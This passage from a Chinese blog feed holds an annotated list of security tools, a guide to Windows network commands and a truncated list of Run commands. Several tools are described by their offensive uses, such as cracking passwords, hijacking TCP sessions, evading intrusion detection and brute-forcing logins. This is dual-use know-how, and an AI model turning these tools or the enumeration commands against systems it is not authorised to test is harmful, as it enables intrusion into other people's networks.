　<strong>工具:</strong>L0phtCrack 4(Windows口令审计和恢复程序)
<p>&nbsp;</p>
<p>　　网址:http://www.atstake.com/research/lc/</p>
<p>　　类别:商业</p>
<p>　　平台:Linux/BSD/Unix/Windows</p>
<p>　　简介:L0phtCrack试图根据从独立的Windows NT/2000工作站、网络服务器、主域控制器或Active Directory上正当获取或者从线路上嗅探到的加密哈希值里破解出Windows口令，含有词典攻击、组合攻击、强行攻击等多种口令猜解方法。</p>
<p>　　<strong>工具:</strong>Retina(eEye公司的风险评估扫描工具)</p>
<p>　　网址:http://www.eeye.com/html/Products/Retina/index.html</p>
<p>　　类别:商业</p>
<p>　　平台:Windows</p>
<p>　　简介:像上面提到的Nessus和ISS Internet Scanner一样，Retina的功能也是用于扫描网络内所有的主机并且报告发现的每一个缺陷。</p>
<p>　　<strong>工具:</strong>Netfilter(当前Linux内核采用的包过滤_blank"&gt;防火墙)</p>
<p>　　网址:http://www.netfilter.org/</p>
<p>　　类别:开放源码</p>
<p>　　平台:Linux</p>
<p>　　简介:Netfilter是一款功能强大的包过滤_blank"&gt;防火墙，在标准的Linux内核内得到实现，iptables是 _blank"&gt;防火墙配置工具。它现在支持有状态或无状态检测的包过滤，支持所有种类的NAT和包分片。相应的，对于非Linux平台上的 _blank"&gt;防火墙，OpenBSD平台上有pf，UNIX平台上有ipfilter，Windows平台上有Zone Alarm个人_blank"&gt;防火墙。</p>
<p>　　<strong>工具:</strong>traceroute/ping/telnet/whois(基本命令)</p>
<p>　　类别:免费</p>
<p>　　平台:Linux/BSD/Unix/Windows</p>
<p>　　简介:当我们使用大量的高水平的工具来辅助安全审计工作时，别忘了这几个最基本的工具。我们每个人都应非常熟悉这几个工具的用法，几乎所有的操作系统上都附带有这几个工具，不过Windows平台上没有whois工具，并且traceroute改名为tracert。</p>
<p>　　<strong>工具:</strong>Fport(增强的netstat)</p>
<p>　　网址:http://www.foundstone.com/index.htm?subnav=resources/</p>
<p>　　navigation.htm&amp;subcontent=/resources/proddesc/fport.htm</p>
<p>　　类别:免费</p>
<p>　　平台:Windows</p>
<p>　　简介:Fport能显示主机上当前所有打开的TCP/IP、UDP端口和端口所属的进程，因此通过使用它能即刻发现未知的开放端口和该端口所属的应用程序，是一款查找木马的好工具。不过，Fport仅支持Windows系统，在许多UNIX系统上有一个netstat命令实现类似功能，Linux系统上用&#8220;netstat -pan&#8221;命令。源代码不公开。</p>
<p>　　<strong>工具:</strong>SAINT(安全管理员的综合网络工具)</p>
<p>　　网址:http://www.saintcorporation.com/saint/</p>
<p>　　类别:商业</p>
<p>　　平台:Linux/BSD/Unix</p>
<p>　　简介:Saint是一款商业化的风险评估工具，但与那些仅支持Windows平台的工具不同，SAINT运行在UNIX类平台上，过去它是免费并且开放源代码的，但现在是一个商业化的产品。</p>
<p>　　<strong>工具:</strong>Network Stumbler(免费的Windows平台802.11嗅探器)</p>
<p>　　网址:http://www.stumbler.net/</p>
<p>　　类别:免费</p>
<p>　　平台:Windows</p>
<p>　　简介:Netstumbler是最有名的寻找无线接入点的工具，另一个支持PDA的WinCE平台版本叫Ministumbler。这个工具现在是免费的，仅仅支持Windows系统，并且源代码不公开，而且该软件的开发者还保留在适当的情况下对授权协议的修改权。UNIX系统上的用户可以使用Kismet来代替。</p>
<strong>工具:</strong>SARA(安全管理员的辅助工具)
<p>&nbsp;</p>
<p>　　网址:http://www-arc.com/sara/</p>
<p>　　类别:开放源码</p>
<p>　　平台:Linux/BSD/Unix</p>
<p>　　简介:SARA是一款基于SATAN安全扫描工具开发而来的风险评估工具，每月更新两次。</p>
<p>　　<strong>工具:</strong>N-Stealth(web服务器扫描工具)</p>
<p>　　网址:http://www.nstalker.com/nstealth/</p>
<p>　　类别:商业</p>
<p>　　平台:Windows</p>
<p>　　简介:N-Stealth是一款商业化的Web服务器安全扫描软件，通常它比whisker、nikto等免费的web扫描器升级的更为频繁。N-Stealth开发商宣称的&#8220;超过20,000条的缺陷和 exploit数据&#8221;和&#8220;每天新增大量的缺陷检查&#8221;是非常可疑的。我们也要注意到，在nessus、ISS、Retina、SAINT和SARA等所有常见的风险评估工具里已含有web扫描组件，不过它们可能没有N-Stealth这样灵活易用和更新频繁。n-stealth不公开源代码。</p>
<p>　　<strong>工具:</strong>AirSnort(802.11 WEP密码破解工具)</p>
<p>　　网址:http://airsnort.shmoo.com/</p>
<p>　　类别:开放源码</p>
<p>　　平台:Linux/BSD/Unix/Windows</p>
<p>　　简介:AirSnort是一款无线局域网密钥恢复工具，由Shmoo小组开发。它监视无线网络中的传输数据，当收集到足够多的数据包时就能计算出密钥。</p>
<p>　　<strong>工具:</strong>NBTScan(从Windows网络上收集NetBIOS信息)</p>
<p>　　网址:http://www.inetcat.org/software/nbtscan.html</p>
<p>　　类别:开放源码</p>
<p>　　平台:Linux/BSD/Unix/Windows</p>
<p>　　简介:NBTscan是一个用于扫描网络上NetBIOS名字信息的程序。这个程序对给出范围内的每一个地址发送NetBIOS状态查询，并且以易读的表格列出接收到的信息，对于每个响应的主机，它列出它的IP地址、NetBIOS计算机名、登录用户名和MAC地址。</p>
<p>　　<strong>工具:</strong>GnuPG/PGP(保护你的文件和通信数据的先进加密程序)</p>
<p>　　网址:http://www.gnupg.org/，http://www.pgp.com/</p>
<p>　　类别:开放源码/商业</p>
<p>　　平台:Linux/BSD/Unix/Windows</p>
<p>　　简介:PGP是由Phil Zimmerman开发的著名加密程序，它使用公钥加密算法和常规的加密技术相结合，能将加密后的文件安全地从一地传递到另一地，从而保护用户的数据免于窃听或其他的安全风险。GnuPG是遵照PGP标准开发的开源程序，不同的是，GnuPG是永远免费的，而PGP对于某些用途要收费。</p>
<p>　　<strong>工具:</strong>Firewalk(高级的traceroute)</p>
<p>　　网址:http://www.packetfactory.net/projects/firewalk/</p>
<p>　　类别:开放源码</p>
<p>　　平台:Linux/BSD/Unix</p>
<p>　　简介:Firewalk使用类似traceroute的技术来分析IP包的响应，从而测定网关的访问控制列表和绘制网络图。2002年10月，这个一流的工具在原来的基础上进行了重新开发。需要注意到的是，Firewalk里面的大多数功能也能由Hping2的traceroute选项来实现。</p>
<p>　　<strong>工具:</strong>Cain &amp; Abel(穷人的L0phtcrack)</p>
<p>　　网址:http://www.oxid.it/cain.html</p>
<p>　　类别:免费</p>
<p>　　平台:Windows</p>
<p>　　简介:Cain &amp; Abel是一个针对Microsoft操作系统的免费口令恢复工具。它通过如下多种方式轻松地实现口令恢复:网络嗅探、破解加密口令(使用字典或强行攻击)、解码被打乱的口令、显示口令框、显示缓存口令和分析路由协议等。源代码不公开。</p>
<p>　　<strong>工具:</strong>XProbe2(主动操作系统指纹识别工具)</p>
<p>　　网址:http://www.sys-security.com/html/projects/X.html</p>
<p>　　类别:开放源码</p>
<p>　　平台:Linux/BSD/Unix</p>
<p>　　简介:XProbe是一款测定远程主机操作系统类型的工具。它依靠与一个签名数据库的模糊匹配以及合理的推测来确定远程操作系统的类型，利用ICMP协议进行操作系统指纹识别是它的独到之处。</p>
<strong>工具:</strong>SolarWinds Toolsets(大量的网络发现、监视、攻击工具)
<p>&nbsp;</p>
<p>　　网址:http://www.solarwinds.net/</p>
<p>　　类别:商业</p>
<p>　　平台:Windows</p>
<p>　　简介:SolarWinds包含大量适合系统管理员做特殊用途的工具，与安全相关的工具包括许多的网络发现扫描器(network discovery scanner)和一个SNMP强力破解器。</p>
<p>　　<strong>工具:</strong>NGrep(方便的包匹配和显示工具)</p>
<p>　　网址:http://www.packetfactory.net/projects/ngrep/</p>
<p>　　类别:开放源码</p>
<p>　　平台:Linux/BSD/Unix/Windows</p>
<p>　　简介:NGrep在网络层实现了GNU grep的大多数功能，基于pcap，可以使你通过指定扩展的正则表达式或十六进制表达式去匹配网络上的数据流量。它当前能够识别流经以太网、PPP、SLIP、FDDI、令牌网和回环设备上的TCP、UDP和ICMP数据包，并且和其他常见的嗅探工具(如tcpdump和snoop)一样，理解bpf过滤机制。</p>
<p>　　<strong>工具:</strong>Perl/Python(脚本语言)</p>
<p>　　网址:http://www.perl.org，http://www.python.org/</p>
<p>　　类别:开放源码</p>
<p>　　平台:Linux/BSD/Unix/Windows</p>
<p>　　简介:当我们使用那些已经开发好的安全工具来处理任务时，别忘了能自己写出(或修改)安全程序也是一件非常重要的事情。利用Perl和Python能非常容易地写出用于系统测试、exploit和修补的脚本程序，使用包含Net::RawIP和协议实现等模块的CPAN(Comprehensive Perl Archive Network:http://www.cpan.org/)或类似的档案能帮助我们比较容易地进行相关的开发。</p>
<p>　　<strong>工具:</strong>THC-Amap(应用程序指纹识别扫描器)</p>
<p>　　网址:http://www.thc.org/releases.php</p>
<p>　　类别:开放源码</p>
<p>　　平台:Linux/BSD/Unix</p>
<p>　　简介:由THC开发的Amap是一个功能强大的扫描器，它通过探测端口响应的应用程序指纹数据来识别应用程序和服务，远甚于通过缺省端口号来判断应用程序和服务的方法。</p>
<p>　　<strong>工具:</strong>OpenSSL(最为重要的SSL/TLS加密库)</p>
<p>　　网址:http://www.openssl.org/</p>
<p>　　类别:开放源码</p>
<p>　　平台:Linux/BSD/Unix/Windows</p>
<p>　　简介:OpenSSL项目是共同努力开发出来的一个健全的、商业级的、全开放的和开放源代码的工具包，用于实现安全套接层协议(SSL v2/v3)和传输层安全协议(TLS v1)以及形成一个功效完整的通用加密库。该项目由全世界范围内志愿者组成的团体一起管理，他们使用Internet去交流、设计和开发这个OpenSSL工具和相关的文档。</p>
<p>　　<strong>工具:</strong>NTop(网络使用状况监测软件)</p>
<p>　　网址:http://www.ntop.org/</p>
<p>　　类别:开放源码</p>
<p>　　平台:Linux/BSD/Unix/Windows</p>
<p>　　简介:Ntop是一款显示网络使用状况的流量监测软件，类似于UNIX平台上监视系统进程的top命令。在交互模式下，ntop会将网络的使用状况显示在用户的终端上;在Web模式下，ntop会做为一个web服务器，创建包含网络状况的HTML网页返回给用户。</p>
<p>　　<strong>工具:</strong>Nemesis(命令行式的UNIX网络信息包插入套件)</p>
<p>　　网址:http://www.packetfactory.net/projects/nemesis/</p>
<p>　　类别:开放源码</p>
<p>　　平台:Linux/BSD/Unix</p>
<p>　　简介:Nemesis项目是为了开发一个UNIX/Linux系统上基于命令行的、方便人们使用的IP栈，它可以自定义数据包、插入数据包、进行协议攻击等，是一个很好的测试_blank"&gt;防火墙、入侵检测系统、路由器和其他网络设备的工具。如果你对Nemesis感兴趣，那么你也可能需要看看hping2，这两者补相互之不足。</p>
<p>　　<strong>工具:</strong>LSOF(列出打开的文件)</p>
<p>　　网址:ftp://vic.cc.purdue.edu/pub/tools/unix/lsof/</p>
<p>　　类别:开放源码</p>
<p>　　平台:Linux/BSD/Unix</p>
<p>　　简介:LSOF是针对Unix的诊断和分析工具，它能显示出由系统里正在运行的进程所打开的文件，也能显示出每一个进程的通讯socket。</p>
<p>　　<strong>工具:</strong>Hunt(Linux平台上高级的包嗅探和会话劫持工具)</p>
<p>　　网址:http://lin.fsid.cvut.cz/~kra/index.html#HUNT</p>
<p>　　类别:开放源码</p>
<p>　　平台:Linux</p>
<p>　　简介:Hunt能监视、劫持、重设网络上的TCP连接，在以太网上使用才有作用，并且含有监视交换连接的主动机制，以及包括可选的ARP转播和劫持成功后的连接同步等高级特征。</p>
<strong>工具:</strong>Honeyd(你个人的honeynet，http://www.honeynet.org/)
<p>&nbsp;</p>
<p>　　网址:http://www.citi.umich.edu/u/provos/honeyd/</p>
<p>　　类别:开放源码</p>
<p>　　平台:Linux/BSD/Unix/Windows</p>
<p>　　简介:Honeyd是一个能在网络上创建虚拟主机的小小后台程序，虚拟主机能被配置成运行任意的服务，并且洽当的服务TCP特性以致他们看起来就像是运行在某个特定版本的操作系统上。Honeyd能在一个模拟的局域网环境里让一台主机配有多个地址，并且可以对虚似主机进行 ping、traceroute。虚拟主机上任何类型的服务都可以依照一个简单的配置文件进行模拟。Honeyd也可以对一台主机做代理服务，而不是模拟它。</p>
<p>　　<strong>工具:</strong>Achilles(可以修改http会话包的代理程序)</p>
<p>　　网址:http://packetstormsecurity.nl/filedesc/achilles-0-27.zip.html</p>
<p>　　类别:开放源码</p>
<p>　　平台:Windows</p>
<p>　　简介:Achilles是一个设计用来测试web应用程序安全性的工具。它是一个代理服务器，在一个HTTP会话中扮演着&#8220;中间人&#8221;(man-in-the-middle)的角色。一个典型的HTTP代理服务器将在客户浏览器和web服务器间转发数据包，但Achilles却载取发向任一方的HTTP会话数据，并且在转发数据前可以让用户修改这些数据。</p>
<p>　　<strong>工具:</strong>Brutus(网络认证的强行破解工具)</p>
<p>　　网址:http://www.hoobie.net/brutus/</p>
<p>　　类别:免费</p>
<p>　　平台:Windows</p>
<p>　　简介:Brutus是一款对远程服务器的网络服务进行口令猜解的工具，支持字典攻击和组合攻击，支持的网络应用包括HTTP、POP3、FTP、SMB、TELNET、IMAP、NTP等。源代码不公开。UNIX系统上的THC-Hydra有类似的功能。</p>
<p>　　<strong>工具:</strong>Stunnel(一个多种用途的SSL加密外壳)</p>
<p>　　网址:http://www.stunnel.org/</p>
<p>　　类别:开放源码</p>
<p>　　平台:Linux/BSD/Unix/Windows</p>
<p>　　简介:Stunnel程序被设计用来做为本地客户端和远程服务器间的SSL加密外壳。它能在POP2、POP3、IMAP等使用inetd后台进程的服务器上增加SSL功能，并且不会影响到程序源代码。它使用OpenSSL或SSLeay库建立SSL会话连接。</p>
<p>　　<strong>工具:</strong>Paketto Keiretsu(极端的TCP/IP)</p>
<p>　　网址:http://www.doxpara.com/paketto</p>
<p>　　类别:开放源码</p>
<p>　　平台:Linux/BSD/Unix</p>
<p>　　简介:Paketto Keiretsu是一组使用新式的不常见的策略去操作TCP/IP网络的工具集合，开发的最初本意是为了在现有TCP/IP架构里去实现一些功能，但现在已经远远超出了最初的本意。包含的工具有:Scanrand，一个罕见的快速的网络服务和拓朴发现系统;Minewt，一个NAT/MAT路由器;linkcat，把以太网链路做为标准的输入输出;Paratrace，不产生新的连接就能追踪网络路径;Phentropy，使用OpenQVIS在三维拓朴空间里能绘制出任意总量的数据源图形。</p>
<p>　　<strong>工具:</strong>Fragroute(破坏入侵检测系统最强大的工具)</p>
<p>　　网址:http://www.monkey.org/~dugsong/fragroute/</p>
<p>　　类别:开放源码</p>
<p>　　平台:Linux/BSD/Unix/Windows</p>
<p>　　简介:Fragroute能够截娶修改和重写向外发送的报文，实现了大部分的IDS攻击功能。Fragroute起重要作用的是一个简单的规则设置语言，以它去实现延迟、复制、丢弃、碎片、重叠、打英重排、分割、源路由或其他一些向目标主机发送数据包的攻击。这个工具开发的本意是去测试入侵检测系统、 _blank"&gt;防火墙、基本的TCP/IP栈的行为。像Dsniff、Libdnet一样，这个优秀的工具也是由Dug Song开发的。</p>
<p>　　<strong>工具:</strong>SPIKE Proxy</p>
<p>　　网址:http://www.immunitysec.com/spikeproxy.html</p>
<p>　　类别:开放源码</p>
<p>　　平台:Linux/BSD/Unix/Windows</p>
<p>　　简介:Spike Proxy是一个开放源代码的HTTP代理程序，用于发现web站点的安全缺陷。它是Spike应用程序测试套件(http://www.immunitysec.com/spike.html)的一部份，支持SQL插入检测、web站点检测、登录表单暴力破解、溢出检测和字典穷举攻击检测等。</p>
<p>　　<strong>工具:</strong>THC-Hydra(网络认证的破解工具)</p>
<p>　　网址:http://www.thc.org/releases.php</p>
<p>　　类别:开放源码</p>
<p>　　平台:Linux/BSD/Unix</p>
<p>　　简介:这个工具能对需要网络登录的系统进行快速的字典攻击，包括FTP、POP3、IMAP、Netbios、Telnet、HTTP Auth、LDAP NNTP、VNC、ICQ、Socks5、PCNFS等，支持SSL，并且现在是Nessus风险评估工具的一部份。</p>
<img src ="http://www.cnitblog.com/chenxin9821/aggbug/62165.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/chenxin9821/" target="_blank">金鳞</a> 2009-10-27 22:01 <a href="http://www.cnitblog.com/chenxin9821/articles/62165.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>网络最经典命令行－网络安全工作者的必杀技</title><link>http://www.cnitblog.com/chenxin9821/articles/61399.html</link><dc:creator>金鳞</dc:creator><author>金鳞</author><pubDate>Mon, 14 Sep 2009 06:21:00 GMT</pubDate><guid>http://www.cnitblog.com/chenxin9821/articles/61399.html</guid><wfw:comment>http://www.cnitblog.com/chenxin9821/comments/61399.html</wfw:comment><comments>http://www.cnitblog.com/chenxin9821/articles/61399.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/chenxin9821/comments/commentRss/61399.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/chenxin9821/services/trackbacks/61399.html</trackback:ping><description><![CDATA[<p>1.最基本，最常用的，测试物理网络的 </p>
<p>　　ping 192.168.0.8 －t ，参数－t是等待用户去中断测试 </p>
<p>&nbsp;&nbsp;&nbsp; 2.查看DNS、IP、Mac等 </p>
<p>　　A.Win98：winipcfg <br>　　B.Win2000以上：Ipconfig/all </p>
<p>　　C.NSLOOKUP：如查看河北的DNS <br>　　C:\&gt;nslookup <br>　　Default Server: ns.hesjptt.net.cn <br>　　Address: 202.99.160.68 <br>　　&gt;server 202.99.41.2 则将DNS改为了41.2 <br>　　&gt; pop.pcpop.com <br>　　Server: ns.hesjptt.net.cn <br>　　Address: 202.99.160.68 </p>
<p>　　Non-authoritative answer: <br>　　Name: pop.pcpop.com <br>　　Address: 202.99.160.212 </p>
<p>&nbsp;&nbsp;&nbsp; 3.网络信使&nbsp; </p>
<p>　　Net send 计算机名/IP　* (广播) 传送内容，注意不能跨网段 <br>　　net stop messenger 停止信使服务，也可以在面板－服务修改 <br>　　net start messenger 开始信使服务 </p>
<p>&nbsp;&nbsp;&nbsp; 4.探测对方对方计算机名，所在的组、域及当前用户名 （追捕的工作原理） </p>
<p>　　ping －a IP －t ，只显示NetBios名 <br>　　nbtstat -a 192.168.10.146 比较全的 </p>
<p>&nbsp;&nbsp;&nbsp; 5.netstat -a 显示出你的计算机当前所开放的所有端口 </p>
<p>　　netstat -s -e 比较详细的显示你的网络资料，包括TCP、UDP、ICMP 和 IP的统计等 </p>
<p>&nbsp;&nbsp;&nbsp; 6.探测arp绑定（动态和静态）列表，显示所有连接了我的计算机，显示对方IP和MAC地址 </p>
<p>　　arp -a </p>
<p>&nbsp;&nbsp;&nbsp; 7.在代理服务器端 </p>
<p>　　捆绑IP和MAC地址，解决局域网内盗用IP！： <br>　　ARP －s 192.168.10.59 00 －50－ff－6c－08－75 <br>　　解除网卡的IP与MAC地址的绑定： <br>　　arp -d 网卡IP </p>
<p>&nbsp;&nbsp;&nbsp; 8.在网络邻居上隐藏你的计算机 </p>
<p>　　net config server /hidden:yes <br>　　net config server /hidden:no 则为开启 </p>
<p>&nbsp;&nbsp;&nbsp; 9.几个net命令 </p>
<p>　　A.显示当前工作组服务器列表 net view，当不带选项使用本命令时，它就会显示当前域或网络上的计算机上的列表。 <br>　　比如：查看这个IP上的共享资源，就可以 <br>　　C:\&gt;net view 192.168.10.8 <br>　　在 192.168.10.8 的共享资源 <br>　　资源共享名 类型 用途 注释 <br>　　-------------------------------------- <br>　　网站服务 Disk <br>　　命令成功完成。 </p>
<p>　　B.查看计算机上的用户帐号列表 net user <br>　　C.查看网络链接 net use <br>　　例如：net use z: \192.168.10.8\movie 将这个IP的movie共享目录映射为本地的Z盘 <br>　　D.记录链接 net session <br>　　例如: C:\&gt;net session <br>　　计算机 用户名 客户类型 打开空闲时间 <br>　　------------------------------------------------------------------------------- <br>　　\192.168.10.110 ROME Windows 2000 2195 0 00:03:12 </p>
<p>　　\192.168.10.51 ROME Windows 2000 2195 0 00:00:39 <br>　　命令成功完成。 </p>
<p>&nbsp;&nbsp;&nbsp; 10.路由跟踪命令 </p>
<p>　　A.tracert pop.pcpop.com <br>　　B.pathping pop.pcpop.com 除了显示路由外，还提供325S的分析，计算丢失包的％ </p>
<p>&nbsp;&nbsp;&nbsp; 11.关于共享安全的几个命令 </p>
<p>　　A.查看你机器的共享资源 net share <br>　　B.手工删除共享（可以编个bat文件，开机自运行，把共享都删了！） <br>　　net share c$ /d <br>　　net share d$ /d <br>　　net share ipc$ /d <br>　　net share admin$ /d <br>　　注意$后有空格。 <br>　　C.增加一个共享： <br>　　c:\net share mymovie=e:\downloads\movie /users:1 <br>　　mymovie 共享成功。 <br>　　同时限制链接用户数为1人。 </p>
<p>&nbsp;&nbsp;&nbsp; 12.在DOS行下设置静态IP </p>
<p>　　A.设置静态IP <br>　　CMD <br>　　netsh <br>　　netsh&gt;int <br>　　interface&gt;ip <br>　　interface ip&gt;set add "本地链接" static IP地址 mask gateway <br>　　B.查看IP设置 <br>　　interface ip&gt;show address </p>
<p>　　Arp <br>　　显示和修改&#8220;地址解析协议 (ARP)&#8221;缓存中的项目。ARP 缓存中包含一个或多个表，它们用于存储 IP 地址及其经过解析的以太网或令牌环物理地址。计算机上安装的每一个以太网或令牌环网络适配器都有自己单独的表。如果在没有参数的情况下使用，则 arp 命令将显示帮助信息。 </p>
<p>　　语法 <br>　　arp [-a [InetAddr] [-N IfaceAddr]] [-g [InetAddr] [-N IfaceAddr]] [-d InetAddr [IfaceAddr]] [-s&nbsp;&nbsp; InetAddr EtherAddr [IfaceAddr]] </p>
<p>　　参数 <br>　　-a [InetAddr] [-N IfaceAddr] <br>　　显示所有接口的当前 ARP 缓存表。要显示指定 IP 地址的 ARP 缓存项，请使用带有 InetAddr 参数的 arp -a，此处的 InetAddr 代表指定的 IP 地址。要显示指定接口的 ARP 缓存表，请使用 -N IfaceAddr 参数，此处的 IfaceAddr 代表分配给指定接口的 IP 地址。-N 参数区分大小写。 <br>　　-g [InetAddr] [-N IfaceAddr] <br>　　与 -a 相同。 <br>　　-d InetAddr [IfaceAddr] <br>　　删除指定的 IP 地址项，此处的 InetAddr 代表 IP 地址。对于指定的接口，要删除表中的某项，请使用 IfaceAddr 参数，此处的 IfaceAddr 代表分配给该接口的 IP 地址。要删除所有项，请使用星号 (*) 通配符代替 InetAddr。 <br>　　-s InetAddr EtherAddr [IfaceAddr] <br>　　向 ARP 缓存添加可将 IP 地址 InetAddr 解析成物理地址 EtherAddr 的静态项。要向指定接口的表添加静态 ARP 缓存项，请使用 IfaceAddr 参数，此处的 IfaceAddr 代表分配给该接口的 IP 地址。 <br>　　/? <br>　　在命令提示符显示帮助。 <br>　　注释 <br>　　InetAddr 和 IfaceAddr 的 IP 地址用带圆点的十进制记数法表示。 <br>　　物理地址 EtherAddr 由六个字节组成，这些字节用十六进制记数法表示并且用连字符隔开（比如，00-AA-00-4F-2A-9C）。 <br>　　通过 -s 参数添加的项属于静态项，它们不会 ARP 缓存中超时。如果终止 TCP/IP 协议后再启动，这些项会被删除。要创建永久的静态 ARP 缓存项，请在批处理文件中使用适当的 arp 命令并通过&#8220;计划任务程序&#8221;在启动时运行该批处理文件。 <br>只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时，该命令才可用。 <br>　　范例 <br>　　要显示所有接口的 ARP 缓存表，可键入： </p>
<p>　　arp -a </p>
<p>　　对于指派的 IP 地址为 10.0.0.99 的接口，要显示其 ARP 缓存表，可键入： </p>
<p>　　arp -a -N 10.0.0.99 </p>
<p>　　要添加将 IP 地址 10.0.0.80 解析成物理地址 00-AA-00-4F-2A-9C 的静态 ARP 缓存项，可键入： </p>
<p>　　arp -s 10.0.0.80 00-AA-00-4F-2A-9C </p>
<p>　　At <br>　　计划在指定时间和日期在计算机上运行命令和程序。at 命令只能在&#8220;计划&#8221;服务运行时使用。如果在没有参数的情况下使用，则 at 列出已计划的命令。 </p>
<p>　　语法 <br>　　at [\ComputerName] [{[ID] [/delete]　/delete [/yes]}] </p>
<p>　　at [[\ComputerName] hours:minutes [/interactive] [{/every:date[,...]　/next:date[,...]}] command] </p>
<p>　　参数 <br>　　 \computername <br>　　指定远程计算机。如果省略该参数，则 at 计划本地计算机上的命令和程序。 <br>　　ID <br>　　指定指派给已计划命令的识别码。 <br>　　/delete <br>　　取消已计划的命令。如果省略了 ID，则计算机中所有已计划的命令将被取消。 <br>　　/yes <br>　　删除已计划的事件时，对来自系统的所有询问都回答&#8220;是&#8221;。 <br>　　hours:minutes <br>　　指定命令运行的时间。该时间用 24 小时制（即从 00:00 [午夜] 到 23:59）的 小时: 分钟格式表示。 <br>　　/interactive <br>　　对于在运行 command 时登录的用户,允许 command 与该用户的桌面进行交互。 <br>　　/every: <br>　　在每个星期或月的指定日期（例如，每个星期四，或每月的第三天）运行 command 命令。 <br>　　date <br>　　指定运行命令的日期。可以指定一周的某日或多日（即，键入 M、T、W、Th、F、S、Su）或一个月中的某日或多日（即，键入从 1 到31 之间的数字）。用逗号分隔多个日期项。如果省略了 date，则 at 使用该月的当前日。 <br>　　/next: <br>　　在下一个指定日期（比如，下一个星期四）到来时运行 command。 <br>　　command <br>　　指定要运行的 Windows 命令、程序（.exe 或 .com 文件）或批处理程序（.bat 或 .cmd 文件）。当命令需要路径作为参数时，请使用绝对路径，也就是从驱动器号开始的整个路径。如果命令在远程计算机上，请指定服务器和共享名的通用命名协定 (UNC) 符号，而不是远程驱动器号。 <br>　　/? <br>　　在命令提示符显示帮助。 <br>　　注释 <br>　　Schtasks 是功能更为强大的超集命令行计划工具，它含有 at 命令行工具中的所有功能。对于所有的命令行计划任务，都可以使用 schtasks 来替代 at。有关 schtasks 的详细信息，请参阅&#8220;相关主题&#8221;。 </p>
<p>　　使用 at <br>　　使用 at 命令时，要求您必须是本地 Administrators 组的成员。</p>
<p>&nbsp;</p>
<img src ="http://www.cnitblog.com/chenxin9821/aggbug/61399.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/chenxin9821/" target="_blank">金鳞</a> 2009-09-14 14:21 <a href="http://www.cnitblog.com/chenxin9821/articles/61399.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>Windows系统:开始--运行--命令大全</title><link>http://www.cnitblog.com/chenxin9821/articles/61397.html</link><dc:creator>金鳞</dc:creator><author>金鳞</author><pubDate>Mon, 14 Sep 2009 06:20:00 GMT</pubDate><guid>http://www.cnitblog.com/chenxin9821/articles/61397.html</guid><wfw:comment>http://www.cnitblog.com/chenxin9821/comments/61397.html</wfw:comment><comments>http://www.cnitblog.com/chenxin9821/articles/61397.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/chenxin9821/comments/commentRss/61397.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/chenxin9821/services/trackbacks/61397.html</trackback:ping><description><![CDATA[<p><strong>Windows系统:开始--运行--命令大全<br>Nslookup-------IP地址侦测器&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; explorer-------打开资源管理器<br>logoff---------注销命令&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; tsshutdn-------60秒倒计时关机命令<br>lusrmgr.msc----本机用户和组&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; services.msc---本地服务设置<br>oobe/msoobe /a----检查XP是否激活&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; notepad--------打开记事本<br>cleanmgr-------垃圾整理&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; net start messenger----开始信使服务<br>compmgmt.msc---计算机管理&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; net stop messenger-----停止信使服务<br>conf-----------启动netmeeting&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; dvdplay--------DVD播放器<br>charmap--------启动字符映射表&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 